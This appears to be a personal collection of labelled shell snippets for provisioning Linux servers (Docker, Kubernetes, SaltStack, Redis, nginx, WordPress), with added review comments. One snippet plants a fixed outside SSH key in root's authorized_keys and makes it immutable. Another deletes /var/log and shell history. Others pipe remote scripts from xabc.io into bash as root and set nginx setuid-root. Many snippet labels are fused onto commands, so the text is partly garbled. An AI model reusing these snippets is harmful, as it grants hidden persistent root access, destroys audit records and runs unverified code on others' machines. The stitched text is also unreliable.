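# k8sssl
# Print the validity window (the "Not Before" / "Not After" lines) of every
# certificate under /etc/kubernetes/pki, followed by a banner naming the file.
# The snippet label used to be fused onto the command, and the closing `done`
# was fused onto the next label, so the loop never parsed. Paths are passed
# NUL-delimited and quoted so unusual file names cannot split into words.
find /etc/kubernetes/pki -maxdepth 2 -name "*.crt" -print0 |
  while IFS= read -r -d '' item; do
    openssl x509 -in "$item" -text -noout | grep Not
    echo "======================$item==============="
  done

# k8s
#/etc/systemd/system/kubelet.service.d/10-kubeadm.conf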
#systemctl daemon-reload;systemctl restart kubelet
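# Make sure both drop-in directories exist (mkdir -p is a no-op when they do).
mkdir -p /etc/modules-load.d /etc/sysctl.d

#######################################
# Download a config file and install it only when the transfer succeeded.
# `wget -O <target>` truncates the target before the transfer starts, so a
# failed download would otherwise leave an empty kernel-module or sysctl
# drop-in behind.
# Arguments: $1 - source URL, $2 - destination path
# Outputs:   a diagnostic on stderr when the download fails
# NOTE(review): the files come from object storage with no integrity check;
# pin a SHA-256 per file and compare it (sha256sum -c) before installing.
#######################################
fetch_conf() {
  local url=$1 dest=$2 tmp
  tmp=$(mktemp) || return
  if wget -t 3 "$url" -O "$tmp"; then
    install -m 644 "$tmp" "$dest"
  else
    printf 'download failed, %s left unchanged: %s\n' "$dest" "$url" >&2
  fi
  rm -f -- "$tmp"
}

fetch_conf https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/etc_modules-load.d_k8s.conf /etc/modules-load.d/k8s.conf
fetch_conf https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/etc_sysctl.d_k8s.conf /etc/sysctl.d/k8s.conf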
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
cat <acme ./acme.sh --issue --dns dns_ali --dnssleep 30 -d $1 -d *.$1
./acme.sh --issue --dns dns_dp --dnssleep 30 -d $1 -d *.$1dl docker run -d -p 80:8000 --restart=always --name=filelist -v /opt/files:/home/ywgx/1/filelist/files ywgx/filelistdi docker exec -it `docker ps|grep -v IMAGE|head -n 1|awk '{print $1}'` /bin/shfilelist curl -LO https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/docker-compose.yml
curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/docker-compose -o /usr/local/bin/docker-compose && chmod +x /usr/local/bin/docker-compose
/usr/local/bin/docker-compose -f docker-compose.yml up -ddr #清理没有运行的 Docker 镜像 docker image prune
#没有被任何容器使用的镜像,同时删除未被使用的数据卷和网络
docker image prune --all --force;docker system prune -a -faliyun_vms pip3 install aliyun-python-sdk-dyvmsapids #停止所有容器
docker stop $(docker ps -aq) 2>/dev/null
docker rm $(docker ps -aq) 2>/dev/nulldockercn [ -d /etc/docker ]||mkdir -p /etc/docker
tee /etc/docker/daemon.json <<-'EOF'
{
"registry-mirrors": ["https://registry.docker-cn.com"]
}
EOF
systemctl restart dockerdd #删除所有镜像
docker stop $(docker ps -aq) 2>/dev/null
docker system prune -a -f
docker rm $(docker ps -aq) 2>/dev/null
docker rmi -f $(docker images -q) 2>/dev/nullaliyun [ -d /etc/docker ]||mkdir -p /etc/docker
tee /etc/docker/daemon.json <<-'EOF'
{
"registry-mirrors": ["https://7u4xdzci.mirror.aliyuncs.com"]
}
EOF
systemctl restart dockerdocker cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
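# RedHat family: register the Docker CE yum repository, install the engine
# and enable/start the service.
if [ "$OS" = "RedHat" ]; then
  # -f makes curl fail on an HTTP error instead of saving the error page as a
  # .repo file that yum would then try to parse.
  curl -fL https://download.docker.com/linux/centos/docker-ce.repo -o /etc/yum.repos.d/docker-ce.repo
  yum install -y docker-ce
  systemctl daemon-reload
  systemctl enable docker.service
  systemctl start docker
fi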
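# Debian family: remove distro Docker packages, add Docker's signed apt
# repository and install the engine from it.
if [ "$OS" = "Debian" ]; then
  # -y: without it apt-get prompts, and when this snippet is piped into a
  # shell the prompt consumes the rest of the script as its answer.
  sudo apt-get -y remove docker docker-engine docker.io containerd runc
  sudo apt-get update
  sudo apt-get -y install apt-transport-https ca-certificates curl gnupg lsb-release
  # --batch --yes lets a re-run overwrite the keyring instead of stopping to
  # ask whether the existing file may be replaced.
  curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --batch --yes --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
  # NOTE(review): the repository path is hard-coded to "ubuntu" and the
  # architecture to amd64, although the OS check above also matches Debian;
  # confirm the target hosts before relying on this.
  echo "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
  apt-get update
  apt-get -y install docker-ce docker-ce-cli containerd.io docker-compose
  service docker restart
fi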
#docker run hello-world
#docker run -d -p 80:8000 --restart=always -v /opt/files:/opt/files ywgx/filelist:alpine
#docker rmi $name 删除镜像
#docker container prune 清理所有处于终止状态的容器
#docker run -d -p 5000:5000 --restart=always --name registry -v /opt/data/registry:/var/lib/registry registry 安装运行 docker-registry
#docker build -t ywgx/filelist . 使用Dockerfile文件 build 构建一个镜像名称 ywgx/filelist
#docker tag $container_id ywgx/test:dev 为镜像添加一个新的标签
#docker tag ywgx/filelist filelist 为镜像ywgx/filelist添加新标签 filelist
#docker search $name 查询镜像
#docker export $container_id > container.tar 导出容器
#docker save -o busybox.tar busybox 导出
#docker load -i busybox.tar 导入
#docker rm -f $container_id 删除容器
#docker run -d -p 80:5000 training/webapp python app.py 后台启动容器并映射本地端口 80
#docker port $container_id 或者 $name 查看容器端口
#docker logs -f $container_id 查看容器内部标准输出
#docker top $name 查看容器内部运行的进程
#cat container.tar | docker import - centos:v1 导入容器到镜像 centos:v1
#docker inspect $name 检查容器的配置和状态信息
#docker run -itd --name ubuntu-test ubuntu 运行容器,并且可以通过 exec 命令进入 ubuntu 容器
#docker run -itd --name centos-test centos 运行容器,并且可以通过 exec 命令进入 centos 容器
#docker commit -m="filelist" -a="ywgx" e218edb10161 ywgx/filelist:v2
#docker image prune -a 删除没有运行的容器镜像
#数据卷
#创建:docker volume create
#删除某个卷:docker volume rm 卷名
#删除所有未使用的卷:docker volume prune
#列出所有卷:docker volume ls
#查看某个卷的信息:docker volume inspect 卷名
#新建一个 Docker 网络
# docker network create -d bridge test-net
# docker run -itd --name test1 --network test-net ubuntu /bin/bash 运行一个容器并连接到新建的 test-net 网络
# docker run -itd --name test2 --network test-net ubuntu /bin/bash 再运行一个容器并连接到新建的 test-net 网络
# test1 容器和 test2 容器建立了互联关系,两个容器直接可以互相ping通
# COPY 和 ADD 指令中选择的时候,可以遵循这样的原则,所有的文件复制均使用 COPY 指令,仅在需要自动解压缩的场合使用 ADD。
# 查看仓库中的镜像 curl 127.0.0.1:5000/v2/_catalog
# 配置DNS
#我们可以在宿主机的 /etc/docker/daemon.json 文件中增加以下内容来设置全部容器的 DNS
#{
# "dns" : [
# "114.114.114.114",
# "8.8.8.8"
# ]
#}
#systemctl restart docker
#docker exec -it $container_id /bin/bash 进入容器ss #ss命令可以查看系统中启动的端口信息,该命令常用选项如下:
#-a显示所有端口的信息
#-n以数字格式显示端口号
#-t显示TCP连接的端口
#-u显示UDP连接的端口
#-l显示服务正在监听的端口信息,如httpd启动后,会一直监听80端口
#-p显示监听端口的服务名称是什么(也就是程序名称)
ss -antulpalpine apk add gcc musl-dev
apk add build-baserb pgrep filelist.py|xargs kill -9 &>/dev/null
pgrep filelist.py|xargs kill -9 &>/dev/null
sleep 1;cd /home/ywgx/1/filelist/;./filelist.py --auth=true --debug=false --port=10000 --root=/home/ywgx/data/filelist &>/home/ywgx/logs/filelist.log &
sleep 3;cd /home/ywgx/1/filelist/;./filelist.py --auth=false --debug=false --port=8000 --root=/home/ywgx/data/download &>/home/ywgx/logs/download.log &
ps aux|grep filelist|grep -v grepcpu 1. 调整CPU频率 cpupower frequency-set -u 2500MHz
cat /proc/cpuinfo | grep 'cpu MHz'
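# st
# String encryption / decryption. $SALT is the passphrase; it is meant to be
# a GitLab CI global variable that only administrators know.
# Encrypt: echo $(cat ./config | base64) |tr -d " "|openssl aes-256-cbc -salt -pbkdf2 -k $SALT > secret_kubeconfig
# Decrypt: cat secret_kubeconfig | openssl aes-256-cbc -d -salt -pbkdf2 -k $SALT |base64 -d > config
#
# The sample value used to be exported unconditionally, which replaced the
# secret supplied by CI with a passphrase printed on this page. It is now only
# a fallback for trying the commands out, and the fallback is announced.
# NOTE(review): `-k $SALT` puts the passphrase on the openssl command line,
# where `ps` shows it; `-pass env:SALT` reads it from the environment instead.
if [ -z "${SALT:-}" ]; then
  printf '%s\n' 'warning: SALT is not set; using the sample passphrase HELLOWORLD, which protects nothing' >&2
  SALT=HELLOWORLD
fi
export SALT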
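# Encrypt ./config (base64-encoded first) with AES-256-CBC, the key derived
# from $SALT via PBKDF2. -pass env:SALT reads the passphrase from the
# environment rather than from the command line, where `-k $SALT` exposed it
# to `ps`; the output still decrypts with the `-k $SALT` form.
# NOTE(review): CBC carries no integrity protection, so a modified
# secret_kubeconfig is not detected when it is decrypted.
echo $(cat ./config | base64) | tr -d " " | openssl aes-256-cbc -salt -pbkdf2 -pass env:SALT > secret_kubeconfig

# hf
# NOTE(review): this snippet appends one fixed public key (comment "hfzp") to
# root's authorized_keys and then marks the file immutable and append-only, so
# whoever holds the matching private key keeps root SSH access and later
# clean-up by an editor or by configuration management fails until the
# attributes are cleared. It then switches SELinux off. On hosts that ran it,
# `lsattr /root/.ssh/authorized_keys` shows the i/a flags and the key carries
# the hfzp comment. Per-admin accounts with centrally managed keys, and
# SELinux left enforcing, avoid both problems.
if ! grep -q "hfzp" /root/.ssh/authorized_keys &>/dev/null; then
  # Existing file: drop the immutable/append-only flags so it can be changed.
  # Otherwise: create /root/.ssh with mode 700.
  [ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh
  echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7cDLbprh+i930XUqo81RXjaLg4Kot5L9aiB789V4L/mDfV7ZeW6k2S1bdIGUrtSmFZnmA/2HQKid102mEzp8Y2/xkwXoTM/hsah+X8DXLX5/xwUb2XuhqZSJy+x/6MLC9MGjvQGFpqvaK1fJZzjFxZaaHoC79iJWbYCzBLo2n+EcmmX559gAgcUSSvjsUQRAy7f+/1Hp/cLB+rqTMVoNgeAZGgMV6QNoxpZlKWSTFeicxN/sNgy6FLpLOyuX5xwsYfpaDdZd+MYlG69XDIakh4cy+kg9q6nQ2bYOw3GhdNMSNnlsU7XkY872OUCTodZ8iu24AvqFE1kxCaIp8egAD hfzp" >> /root/.ssh/authorized_keys
  chmod 600 /root/.ssh/authorized_keys
  chattr +ai /root/.ssh/authorized_keys
fi
# NOTE(review): setenforce takes 0/1 or Enforcing/Permissive, so "-1" is most
# likely rejected (its output is discarded); the persistent change is the
# config edit on the next line, which takes effect at the next boot.
which setenforce &>/dev/null&&setenforce -1 &>/dev/null
[ -e /etc/selinux/config ]&&grep -q "SELINUX=enforcing" /etc/selinux/config&&sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/config

# city
# Look up the city for a fixed IP address at two services (the second one
# over plain HTTP).
curl -s --connect-timeout 5 https://ipinfo.io/44.192.95.161/city;curl -s --connect-timeout 5 http://freeapi.ipip.net/44.192.95.161

# zola
# NOTE(review): `zola serve` is bound to 0.0.0.0 here, so it listens on every
# interface of the host; bind to 127.0.0.1 unless remote access is intended.
nohup ~/bin/zola serve --interface 0.0.0.0 --port 3003 --base-url / &>~/logs/zola-docs.log &

# hm
helm init --stable-repo-url https://charts.helm.sh/stable --service-account tiller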
helm init --client-only --skip-refresh
helm repo rm stable
helm repo add stable https://charts.helm.sh/stablesredis BUILD=/tmp/ywgx
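# Build redis-stable from source inside $BUILD (assigned just before this
# block).
# NOTE(review): a fixed directory name under /tmp can be created in advance by
# another local user; a directory from `mktemp -d` avoids that.
mkdir -p "$BUILD"
# Stop if the directory cannot be entered, otherwise the tarball would be
# unpacked and built wherever the shell happens to be.
cd "$BUILD" || exit 1
# Fetched over HTTPS rather than plain HTTP so the source cannot be altered in
# transit.
# NOTE(review): there is still no checksum or signature check on the tarball
# before it is compiled.
wget -t 3 https://download.redis.io/redis-stable.tar.gz -O - | tar xfz -
cd redis*/ || exit 1
# Crude distro detection from /etc/issue* and /etc/*release.
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
# Both `if` statements were missing `then`, which is a syntax error.
if [ "$OS" = "RedHat" ]; then
  CC=clang make
fi
if [ "$OS" = "Debian" ]; then
  CC=clang make MALLOC=libc
fi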
#cd src/
#for i in `find . -perm -0755 -a ! -type d`;do mv $i $REDIS_BIN/;donec rm -f /etc/motd
hostnamectl --static set-hostname central-44.192.95.161;
yum -y update
yum -y install epel-release
yum -y install wget gcc gcc-c++ make vim pcre-devel libffi-devel openssl-devel python-devel libevent-devel postgresql-devel readline-devel perl-ExtUtils-Embed iptables iptables-services inotify-tools bzip2 unzip rsync psmisc python3-devel net-tools
yum -y install bash-completion
yum -y install python-pip
yum -y install chrony
#yum -y erase sudo
yum clean all
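# Download the installer completely before running it: with `curl | bash` a
# dropped connection runs a truncated script, and an HTTP error page is fed to
# the shell as if it were the installer. -f makes curl fail on HTTP errors.
# NOTE(review): the URL has no scheme, so curl fetches it over plain HTTP, and
# the script then runs as root with no integrity check. Serve it over HTTPS
# and verify a pinned checksum before executing it.
awscli_script=$(mktemp) &&
  curl -fsS xabc.io/awscli -o "$awscli_script" &&
  bash "$awscli_script"
rm -f -- "$awscli_script"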
timedatectl set-timezone Asia/Shanghai
curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/xabc.sh -o /etc/profile.d/xabc.sh
chmod 644 /etc/profile.d/xabc.sh
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/vim.tgz -O -|tar xzf - -C ~
[ -d /root/.pip ]||mkdir -p /root/.pip
curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/pip.conf -o /root/.pip/pip.conf
pip2 install pip==9.0.3
pip2 install --upgrade setuptools==30.1.0
pip2 install --upgrade Cython redis pyOpenSSL
pip2 install functions==0.7.0
pip2 install tornado==5.1.1
pip2 install redis==3.5.3
pip2 install tornadio2==0.0.4
pip2 install tornado_jinja2==0.2.4
pip2 install psycopg2-binary==2.8.6
pip2 install Pillow==2.0.0
pip2 install paramiko==2.7.2
pip2 install sqlalchemy==1.3.20
pip2 install sqlalchemy_utils==0.36.6
pip2 install influxdb==5.3.1
pip2 install futures==3.1.1
pip2 install ujson==2.0.3
pip2 install mako
mv /usr/lib/python2.7/site-packages /usr/lib/python2.7/site-packages.bk
mv /usr/lib64/python2.7/site-packages /usr/lib64/python2.7/site-packages.bk
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/site-packages.tgz -O -|tar xzf - -C /usr/lib/python2.7
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/site-packages-64.tgz -O -|tar xzf - -C /usr/lib64/python2.7
yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm
yum -y clean expire-cache
yum -y install salt-master salt-minion salt-api salt-ssh
pip3 install -U pip setuptools
pip3 install redis==3.5.3 flask cryptography pyinotify influxdb salt-pepper gevent pymongo
pip3 install aliyun-python-sdk-dyvmsapi
echo `hostname` > /etc/salt/minion_id
systemctl enable salt-master.service
systemctl enable salt-api.service
systemctl enable chrony
systemctl disable firewalld.service &>/dev/null
curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/master -o /etc/salt/master
[ -d /srv/salt/user ]||mkdir -p /srv/salt/user
[ -d /srv/zero/0 ]||mkdir -p /srv/zero/0
[ -d /srv/zero/1 ]||mkdir -p /srv/zero/1
[ -d /srv/zero/2 ]||mkdir -p /srv/zero/2
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/O.tgz -O -|tar xzf - -C /srv/zero/0
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero/2
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/node.tgz -O -|tar xzf - -C /srv/zero/1
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/grafana.tgz -O -|tar xzf - -C /srv/zero/1
#wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/matrix.tgz -O -|tar xzf - -C /srv/zero/1
ln -fs /srv/zero/1/node/bin/npm /usr/bin/npm
ln -fs /srv/zero/1/node/bin/node /usr/bin/node
chmod 100 /srv/zero/2/redis/bin/*
ln -fs /srv/zero/2/redis/bin/redis-cli /usr/local/bin/
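# Make sure the unprivileged "nobody" account and group exist.
id -u nobody &>/dev/null || useradd nobody -r -s /bin/false
groupadd -f nobody &>/dev/null
# owner:group written with a colon; the dot separator is a legacy spelling.
chown root:nobody /srv/zero/0/openresty/nginx/sbin/nginx
# NOTE(review): +xs sets setuid and setgid on a root-owned binary that every
# user may execute, so any local account can start nginx with root's
# effective uid. If the only goal is binding ports 80/443, the file
# capability cap_net_bind_service (setcap) grants that without setuid root.
chmod +xs /srv/zero/0/openresty/nginx/sbin/nginx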
yum install -y postgresql-server
service postgresql initdb
service postgresql start
service salt-master start
systemctl enable postgresql.service
# Generate a DSA host key with an empty passphrase when none exists.
# NOTE(review): DSA host keys are disabled by default in current OpenSSH
# releases; confirm what still depends on this key.
[ -e /etc/ssh/ssh_host_dsa_key ]||ssh-keygen -q -t dsa -P '' -f /etc/ssh/ssh_host_dsa_key
# Make rc.local executable so it runs at boot.
chmod 755 /etc/rc.d/rc.local
systemctl disable salt-minion.service
#wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/build.tgz -O -|tar xzf - -C /srv/salt
# NOTE(review): this removes the whole /var/log tree (not only its contents),
# the salt-minion cache and root's shell history. It leaves no record of what
# this provisioning run did, and services that expect their /var/log
# subdirectory may fail to start until it is recreated.
rm -fr /var/log /var/cache/salt/minion /root/.bash_history
IP=${SSH_CONNECTION% *};IP=${IP##* };[ -n "$IP" ]||IP=$(ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\.|^100\./'|head -1)
REGION=$(curl -s -m 5 http://ip-api.com/line/44.192.95.161?fields=city);[ -n "$REGION" ]||REGION="Shanghai"
printf "\033[1;32;40m%s\033[0m\n" "Login 和 Central 机器在同一个内网请在 Login 机器执行 # curl -s xabc.io/l-$IP-$REGION|bash 继续完成对 Login 的基础部署"
printf "\033[1;32;40m%s\033[0m\n-----------------\n" "Master 和 Central 机器在同一个内网请在 Master 机器执行 # curl -s xabc.io/m-$IP-$REGION|bash 继续完成对 Master 的基础部署"
printf "\033[1;32;40m%s\033[0m\n" "Login 和 Central 机器不在同一内网请在 Login 机器执行 # curl -s xabc.io/l-44.192.95.161-$REGION|bash 继续完成对 Login 的基础部署"
printf "\033[1;32;40m%s\033[0m\n" "Master 和 Central 机器不在同一内网请在 Master 机器执行 # curl -s xabc.io/m-44.192.95.161-$REGION|bash 继续完成对 Master 的基础部署"
printf "\033[1;32;31m%s\033[0m\n" "特别说明 $REGION 这个字段代表网络区域信息,可根据实际情况改成自己机器所在区域标识信息,同一网络节点内login,master机器,其region标识信息一致,如Beijing,必须与/srv/pillar/central.sls 里面 region 定义一致"mac #scutil --set ComputerName "E"
#scutil --set LocalHostName "E"
#scutil --set HostName "E"
#nvram AutoBoot=%00 关闭开盖启动
#nvram AutoBoot=%03 恢复开盖启动
#sudo defaults write /Library/Preferences/com.apple.loginwindow SHOWOTHERUSERS_MANAGED -bool FALSE 删除开机界面上的 “其他”用户登陆选项
#pwpolicy -clearaccountpolicies 运行后,可以设置2位密码i0 if [ $USER = ywgx ];then
[ -d /home/ywgx/0 ]||mkdir -p /home/ywgx/0
[ -d /home/ywgx/1 ]||mkdir -p /home/ywgx/1
[ -d /home/ywgx/2 ]||mkdir -p /home/ywgx/2
[ -d /home/ywgx/logs ]||mkdir -p /home/ywgx/logs
[ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/0/openresty.tgz -O -|tar xzf - -C /home/ywgx/0
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/0/nginx.conf -O /home/ywgx/0/openresty/nginx/conf/nginx.conf
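# TLS certificate and private key for nginx.
[ -d /home/ywgx/0/openresty/nginx/conf/ssl ]||mkdir -p /home/ywgx/0/openresty/nginx/conf/ssl
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/0/filelist.cn.pem -O /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.pem
# The key used to be written with the default umask and was therefore
# readable by every local user. The subshell keeps umask 077 scoped to this
# download; the chmod also covers a file that already existed with wider bits.
# NOTE(review): the private key is fetched from an object-storage URL. If that
# object is readable without credentials the key should be treated as exposed
# and rotated; confirm the bucket ACL.
(umask 077; wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/0/filelist.cn.key -O /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.key)
chmod 600 /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.key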
[ -d /home/ywgx/0/openresty/nginx/conf/vhost ]||mkdir -p /home/ywgx/0/openresty/nginx/conf/vhost
chmod +xs /home/ywgx/0/openresty/nginx/sbin/nginx
pgrep nginx||~/0/openresty/nginx/sbin/nginx
fii1 if [ $USER = ywgx ];then
[ -d /home/ywgx/1 ]||mkdir -p /home/ywgx/1
[ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/filelist-bin.tgz -O -|tar xzf - -C /home/ywgx/1
fii2 if [ $USER = ywgx ];then
[ -d /home/ywgx/2 ]||mkdir -p /home/ywgx/2
[ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/2/redis.tgz -O -|tar xzf - -C /home/ywgx/2
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/2/mongo.tgz -O -|tar xzf - -C /home/ywgx/2
fissl proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header X-NginX-Proxy true;
proxy_set_header Connection "";
log_format main "$status $request_time $request_method $host$request_uri [$http_user_agent] [$time_local] [$http_x_forwarded_for $remote_addr] $http_referer";
access_log logs/access.log main;
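# NOTE(review): besides the ECDHE suites this string admits the generic AES
# and HIGH groups, which include suites without forward secrecy; consider
# narrowing it to ECDHE AEAD suites once client requirements are known.
ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4:!DH:!DHE;
# TLS 1.1 is deprecated (RFC 8996); only 1.2 and 1.3 are offered.
ssl_protocols TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers on;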
upstream EX{
keepalive 64;
server 127.0.0.1:7001;
}
server{
listen 80;
listen 443 ssl http2;
server_name EX;
ssl_certificate ssl/EX.pem;
ssl_certificate_key ssl/EX.key;
location /{
proxy_pass http://EX;
}
}ssh mv /etc/ssh/sshd_config /etc/ssh/sshd_config.bk
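# Fetch the replacement sshd_config into a temp file, let sshd check it
# (`sshd -t -f`), and install it only when both steps succeed. Previously the
# download was written straight over /etc/ssh/sshd_config, so a failed or
# tampered transfer became the live configuration at the restart that follows.
# On failure the backup made by the preceding mv (sshd_config.bk) is restored,
# so the restart keeps the previous settings instead of locking admins out.
# NOTE(review): the file is remote content that decides who may log in; pin
# and verify a checksum as well.
sshd_tmp=$(mktemp)
if wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/sshd_config -O "$sshd_tmp" && sshd -t -f "$sshd_tmp"; then
  install -m 600 "$sshd_tmp" /etc/ssh/sshd_config
else
  printf '%s\n' 'sshd_config download or validation failed; restoring /etc/ssh/sshd_config.bk' >&2
  cp -p /etc/ssh/sshd_config.bk /etc/ssh/sshd_config
fi
rm -f -- "$sshd_tmp"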
systemctl restart sshd.servicechrony cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y install epel-release
yum -y install chrony
systemctl enable chrony
systemctl restart chronyd
fi
if [ "$OS" = "Debian" ];then
apt-get -y install chrony
chkconfig --add chronyd
fi
timedatectl set-timezone Asia/Shanghaijava java -Xmx3550m -Xms3550m -Xmn2g -Xss128k
-Xmx3550m:设置JVM最大可用内存为3550M。
-Xms3550m:设置JVM促使内存为3550m。此值可以设置与-Xmx相同,以避免每次垃圾回收完成后JVM重新分配内存。
#以 java 进程所在用户执行,获取 heap dump 文件
#jmap -dump:format=b,file=heap.hprof
#获取thread dump文件
#jstack > thread.txtmongo echo doing...
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/mongodb/mongo.tgz -O -|tar xzf - -C /opt
echo 65535 > /proc/sys/net/core/somaxconn
echo never > /sys/kernel/mm/transparent_hugepage/defrag
echo never > /sys/kernel/mm/transparent_hugepage/enabled
pgrep mongod||/opt/mongo/bin/mongod -f /opt/mongo/conf/mongod.confc1 curl -s xabc.io/b|bash
curl -s xabc.io/v|bash
timedatectl set-timezone Asia/Shanghai
yum -y install epel-release
yum -y install wget net-tools gcc gcc-c++ make vim iptables iptables-services inotify-tools unzip psmisc rsync
[ -e /etc/rc.local ]&&sed -i '/qcloud/d' /etc/rc.local
hostnamectl --static set-hostname central-44.192.95.161;
systemctl disable firewalld
yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm
yum clean expire-cache
yum -y install salt-master
yum -y install salt-minion
yum -y install salt-ssh
pip3 install redis flask cryptography pyinotify
systemctl enable iptables.service
systemctl enable salt-master.service
[ -d /srv/salt ]||mkdir -p /srv/salt
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/iptables -O /etc/sysconfig/iptables
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/master -O /etc/salt/master
systemctl restart salt-master.service
[ -d /srv/zero/0 ]||mkdir -p /srv/zero/0
[ -d /srv/zero/1 ]||mkdir -p /srv/zero/1
[ -d /srv/zero/2 ]||mkdir -p /srv/zero/2
[ -d /srv/zero/bin ]||mkdir -p /srv/zero/bin
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/O.tgz -O -|tar xzf - -C /srv/zero/0
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero/2wordpress cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
id -u nobody &>/dev/null||useradd nobody -r -s /bin/false
groupadd -f nobody &>/dev/null
if [ "$OS" = "RedHat" ]
then
yum -y install yum-utils
yum -y install epel-release
yum -y install vim wget bzip2 unzip rsync
yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/MariaDB.repo -O /etc/yum.repos.d/MariaDB.repo
yum -y install MariaDB-server MariaDB-client
yum -y install php72w
yum -y install php72w-cli php72w-common php72w-devel php72w-mysql php72w-fpm
yum -y install php72w-gd php72w-imap php72w-ldap php72w-odbc php72w-pear php72w-xml php72w-xmlrpc php72w-mbstring php72w-pdo
systemctl start mariadb
[ -d /etc/rc.d ]||mkdir -p /etc/rc.d
[ -d /etc/php-fpm.d ]||mkdir -p /etc/php-fpm.d
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/RedHat-php.conf -O /etc/php-fpm.d/www.conf
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-rc.local.conf -O /etc/rc.d/rc.local
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/mysql-server.cnf -O /etc/my.cnf.d/server.cnf
chmod 755 /etc/rc.d/rc.local
# Set the MariaDB root@localhost password and create the wordpress database.
# NOTE(review): the root password is the two-character literal 'io', printed
# on this page. Replace it with a generated secret kept outside the script;
# confirm whether the downloaded config files expect this value.
